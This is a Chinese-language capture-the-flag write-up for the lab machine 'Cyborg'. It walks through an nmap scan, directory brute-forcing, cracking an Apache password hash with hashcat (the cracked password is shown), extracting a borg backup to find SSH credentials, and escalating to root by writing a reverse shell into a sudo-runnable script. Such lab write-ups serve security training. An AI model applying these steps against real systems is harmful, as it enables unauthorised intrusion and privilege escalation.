Cyborg

Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-28 07:42 GMT
Nmap scan report for ip-10-10-190-220.eu-west-1.compute.internal (10.10.190.220)
Host is up (0.00065s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:D2:C4:A7:98:45 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.65 seconds

dirb爆破目录,有/etc和/admin

etc有个密码hash,保存下来
Pasted%20image%2020240128155441
用hash-identifier识别一下
hashcat -m 1600 1.hash /usr/share/wordlists/rockyou.txt
hashcat一把梭

$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward           
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Sun Jan 28 15:56:57 2024 (2 secs)
Time.Estimated...: Sun Jan 28 15:56:59 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    20537 H/s (10.82ms) @ Accel:64 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 39168/14344385 (0.27%)
Rejected.........: 0/39168 (0.00%)
Restore.Point....: 38912/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: treetree -> lynnlynn
Hardware.Mon.#1..: Util: 91%

然后查看admin页面发现这个是一个music archive,把那个下载下来,解压,查看
Pasted%20image%2020240128160826

百度一下,用命令恢复
borg extract home/field/dev/final_archive::music_archive
恢复完进入到新的文件夹,简单搜集一下,密码就看到了

Pasted%20image%2020240128160823

ssh上去后sudo -l发现有一个脚本有sudo权限

alex@ubuntu:~$ ls -al /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh

用户竟然是alex,直接加权限,写入一个反弹shell,提权成功